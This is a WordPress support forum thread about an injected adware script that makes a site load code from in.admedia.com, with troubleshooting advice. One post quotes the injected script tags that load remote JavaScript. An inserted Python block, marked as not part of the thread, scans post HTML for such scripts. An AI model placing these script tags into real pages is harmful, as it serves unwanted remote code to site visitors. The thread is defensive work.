What is in.admedia.com (21 posts)

  1. insurgenesis
    Member
    Posted 1 year ago #

    Hi I noticed something weird today...
    I'm testing a site locally and my sidebars disappear and return unannounced.
    The page load also became much longer since I installed a certain plugin.
    Upon loading it says "connecting to in.admedia.com" and a javascript snippet appears at the bottom of some posts (only visible in html text mode). When I delete it it simply reappears.
    Does anyone know what this is?

  2. michael.mariart
    Member
    Posted 1 year ago #

    The first thing to do is disable the plugin and see if that fixes your problem. If it's only doing it since you installed that plugin there's a very good chance that the plugin is the cause of it.

    What is actually coming from in.admedia.com is advertising code. Someone or something is trying to add some advertising to your site through whatever means they are using.

  3. insurgenesis
    Member
    Posted 1 year ago #

    When the site is fully loaded and I do Ctrl + U I can actually see all the instances of the code.
    I think it's what's known as a script inject.
    The bad news is that the code's still there after deactivating plugins.
    Will I be OK if all (visible) instances of the code can be removed, or should I use something more sophisticated to find and remove?

  4. michael.mariart
    Member
    Posted 1 year ago #

    The first thing that I would do is run your site through the Sucuri checker at

    http://sitecheck.sucuri.net/scanner/

    This will tell you if anything bad is happening there.

    But yes, you should try and remove all of the code that's been added to your site. Be aware that if your site has been hacked or compromised, then removing the code won't do that much because it will just be added back in later on.

  5. insurgenesis
    Member
    Posted 1 year ago #

    Thanks for your quick response.
    How can I run it on a site that's on my local server and not live yet?

  6. michael.mariart
    Member
    Posted 1 year ago #

    You can't. But if it's on your local server I wouldn't be quite as concerned with it being hacked. That's actually pretty unlikely on a site that's private like that. Just go and remove the code where it's found.

  7. insurgenesis
    Member
    Posted 1 year ago #

    In your opinion, does it sound like injection?
    And if so, will I be able to find/remove the origin of the code in a plugin's source file, or is the whole idea to remove the cause-plugin entirely and never attempt to use it again?

  8. michael.mariart
    Member
    Posted 1 year ago #

    "Injection" can be done in many different ways, and this is probably one of them.

    If you find that it's a plugin doing it, I'd ditch that plugin completely. Even if you remove the code now, it will come back in any future updates that it has. I don't give things like that any chance.

  9. insurgenesis
    Member
    Posted 1 year ago #

    It's really disconcerting that this sort of thing is rampant and widespread - considering that it's only local still.

    I don't know what to do.

    ...For what it's worth in this context, my wp-config "block external requests" is set to true. I would like to believe this illustrates the extent to which I wanted to be isolated from the external.

  10. insurgenesis
    Member
    Posted 1 year ago #

    Is there any way to be certain this thing hasn't inscribed itself into everything?
    Even when I delete the code from my posts in html view and press update it connects again to the very same place.

  11. michael.mariart
    Member
    Posted 1 year ago #

    That means that it's somewhere in your code, not in your posts.

    Disable EVERY plugin and change to the default theme. Now remove the code from your posts, and go and check if they show on your main site. From there, enable plugins one-by-one (only one at a time, never more), do an update to a post, and go and check it on the live site again. This will show you if it's a plugin that's causing this as you'll see the code back after you enable one of the plugins, or the theme. When you find out which one it is, delete that plugin completely.

  12. insurgenesis
    Member
    Posted 1 year ago #

    thanks

  13. insurgenesis
    Member
    Posted 1 year ago #

    It's not a plugin - I disabled all.
    I'm using a child theme. Perhaps you know where else I can look?

  14. michael.mariart
    Member
    Posted 1 year ago #

    If it's not a plugin or your theme (you didn't say you went back to the default theme...) then I don't know where it could be. I'd suggest that you download the entire WP zip file again and re-install that over the top of what you have now. If that doesn't fix it, do a complete re-install.

  15. insurgenesis
    Member
    Posted 1 year ago #

    Sorry, went back to default theme.
    Upon page load same message appears.
    It seems to be connecting to a site (or is instructed to do so) regardless of my choice of plugins and theme.
    What is an sql injection?

  16. polaris1990
    Member
    Posted 1 year ago #

    Hi men, I've got the same problem.
    I use Joomla 1.7 CMS
    The problem in local site...
    Some pages loading too slow...
    Upon loading it says "connecting to in.admedia.com"
    Here is the page:
    http://sws-studio.com/demo/avm/company/brands
    I've noticed that all sites are connecting to in.admedia.com, but some pages load too slow.
    Here is a code which it adds in some places:

    <br /><br data-mce-bogus="1" />
    <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
    <script src="https://in.admedia.com/?id=ODorNiU" type="text/javascript"></script>

  17. insurgenesis
    Member
    Posted 1 year ago #

    @polaris1990
    I don't see it when I load your page from the link provided.
    Did you clear your browser cache properly?
    Which browser are you using?

  18. polaris1990
    Member
    Posted 1 year ago #

    http://bulkin.lootsk.com/2012/.jpg
    I've cleaned all, I tried using different browsers and computers

  19. insurgenesis
    Member
    Posted 1 year ago #

    In my case a similar script was placed below each post only if I switched from html to visual mode in the text editor while editing a post.

    Try disabling ALL plugins and delete all instances of the code manually. You can then do a proper search for remaining bits if you think you didn't catch all.

    I then installed this http://wordpress.org/extend/plugins/tinymce-advanced/ to take over the role of the default editor. Besides other useful features it offers, I am now able to switch back and forth between the editing modes without the code slipping in.

    Here's how the saga played out for me:
    http://wordpress.org/support/topic/how-to-recognise-a-script-injection?replies=46
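
The "proper search for remaining bits" suggested above can be scripted. This is an added example, not part of the original thread: it lists every `<script src>` in stored post HTML whose host is not on an allowlist. `ALLOWED_HOSTS`, the function names and the sample posts are assumptions constructed for illustration; post 2 reuses the snippet quoted earlier in the thread.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts this site is expected to load scripts from. Adjust per site.
ALLOWED_HOSTS = {"localhost", "example.test"}

class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in an HTML fragment."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src.strip())

def external_scripts(html, allowed_hosts=ALLOWED_HOSTS):
    """Return (host, src) for each script loaded from a host not in allowed_hosts."""
    parser = ScriptSrcCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src in parser.sources:
        # hostname is None for relative URLs (same origin) and is lowercased,
        # so protocol-relative and mixed-case URLs are still matched.
        host = urlparse(src).hostname
        if host and host not in allowed_hosts:
            findings.append((host, src))
    return findings

def scan_posts(posts, allowed_hosts=ALLOWED_HOSTS):
    """posts maps post id -> stored HTML; returns {post_id: findings} for hits only."""
    report = {pid: external_scripts(html, allowed_hosts) for pid, html in posts.items()}
    return {pid: hits for pid, hits in report.items() if hits}

# Constructed sample data; post 2 carries the snippet quoted in the thread.
SAMPLE_POSTS = {
    1: '<p>Hello</p><script src="/wp-includes/js/jquery/jquery.js"></script>',
    2: '<p>Brands</p><br /><br data-mce-bogus="1" />\n'
       '<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/'
       'loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>\n'
       '<script src="https://in.admedia.com/?id=ODorNiU" type="text/javascript"></script>',
    3: '<script src="//In.AdMedia.com/x.js"></script>',
}

if __name__ == "__main__":
    for post_id, hits in scan_posts(SAMPLE_POSTS).items():
        for host, src in hits:
            print(f"post {post_id}: {host} <- {src}")
```

Feed it the post bodies from a database export; the same function works on theme or template files read as text.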

  20. insurgenesis
    Member
    Posted 1 year ago #

    BTW - you can also do magical things with .htaccess to block certain requests you don't trust:
    http://perishablepress.com/eight-ways-to-blacklist-with-apaches-mod_rewrite/
    But make sure your server configuration will like what you do to it...

    I happen to have the IP address associated with the domain name in the script so it was easy to block it. Although I understand that if the recurrence of the code is generated from within your code base you would want to know more about it and not simply "block" it.

    [ Please do not bump, that's not permitted here. ]

  21. polaris1990
    Member
    Posted 1 year ago #

    Hi there! Reinstallation of WAMP and cleaning of the code helped!
    Thanks to all!

Topic Closed

This topic has been closed to new replies.
